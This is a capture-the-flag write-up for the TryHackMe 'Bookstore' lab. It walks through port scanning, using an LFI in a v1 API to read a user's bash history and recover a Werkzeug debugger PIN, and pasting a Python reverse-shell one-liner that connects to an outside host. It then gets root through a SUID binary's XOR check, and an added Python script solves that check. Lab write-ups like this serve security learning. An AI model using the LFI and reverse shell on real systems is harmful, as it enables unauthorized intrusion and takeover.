CTF-Writeups/TryHackMe/Bookstore.md
2020-11-29 00:11:01 +05:00

TryHackMe-Bookstore

NMAP

Nmap scan report for 10.10.117.123
Host is up (0.15s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)
|   256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)
|_  256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry 
|_/api
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds

PORT 80

PORT 5000

As we saw from the nmap scan, there is a robots.txt file on port 5000.

Running gobuster on this port, we find a console, which is the Werkzeug debugger.

But it's asking for a PIN.

I found a Metasploit exploit for it, but it didn't work.

Going back to port 80 and looking at the login page source, we find that the PIN is in the bash history file of the user sid.

We know there are two versions of the API, v1 and v2; v1 is likely to be vulnerable to LFI, so let's choose the endpoint that takes a parameter:

/api/v2/resources/books?id=1

Change this to:

/api/v1/resources/books?id=.bash_history

Then fuzz the parameter name with wfuzz.

Wfuzz

wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

Here:

-u is the host with the API endpoint; in ?FUZZ the ? comes before the parameter and FUZZ marks the location where we want to find the parameter name; --hc tells wfuzz to hide responses with the given status code, here 404 (not found).

cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit 

Now we can interact with the debugger. To get onto the box, we paste a reverse shell into it:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Paste this into the debugger and start your netcat listener.

Privilege Escalation

We see a binary with the SUID bit set, so it runs as root, but we need to figure out what it does and how to execute it properly to get root.

Analyzing the binary with Ghidra:

local_1c = ? (the number we are going to input)
4374 = a hard-coded constant
local_18 = 23987

local_14 has to equal 1573724660.

I have converted those hexadecimal numbers to decimal to get a better understanding.

local_14 = local_1c ^ 4374 ^ local_18

What's happening here is that these three values are combined with the exclusive OR operator ^. We don't know what value to input in order to get 1573724660.

So I'll convert the hex values to decimal and XOR them together.

1573724660 ^ 4374 ^ local_18
= 1573724660 ^ 4374 ^ 23987
= 1573724660 ^ 19621
= 1573743953
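The same derivation as a script, added here as an example and not code from the writeup or the challenge binary: it models the decompiled check with the decimal constants above and recovers the expected input by XORing the target with the same constants, which works because XOR is its own inverse (a ^ k ^ k == a). The hex equivalents in the comments are my conversions.

```python
# Added example: solve the XOR check recovered from the SUID binary.
# Constants are the decimal values quoted in the writeup.
KEY1 = 4374          # 0x1116, hard-coded constant in the binary
LOCAL_18 = 23987     # 0x5db3, second hard-coded value
TARGET = 1573724660  # 0x5dcd21f4, the value local_14 must equal


def binary_check(local_1c: int) -> bool:
    """Mirror of the decompiled comparison:
    local_14 = local_1c ^ 4374 ^ local_18, then local_14 == 1573724660."""
    local_14 = local_1c ^ KEY1 ^ LOCAL_18
    return local_14 == TARGET


def solve_input(target: int, *keys: int) -> int:
    """Undo the XOR chain: XORing the target with every fixed key recovers the
    input, since each key cancels itself when the binary applies it again."""
    value = target
    for k in keys:
        value ^= k
    return value


def main() -> None:
    combined = KEY1 ^ LOCAL_18                 # 19621, as in the writeup
    wanted = solve_input(TARGET, KEY1, LOCAL_18)
    print(f"{KEY1} ^ {LOCAL_18} = {combined}")
    print(f"input to enter: {wanted} (0x{wanted:x})")   # 1573743953
    print("check passes:", binary_check(wanted))
    # Any other value fails: XOR with fixed keys is a bijection, so exactly one
    # input maps to the target. This is also why a hard-coded XOR "password"
    # check gives no real protection once the constants are read from the binary.
    print("check with wrong value:", binary_check(wanted + 1))


if __name__ == "__main__":
    main()
```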

Let's try the final result we got.

And we are root!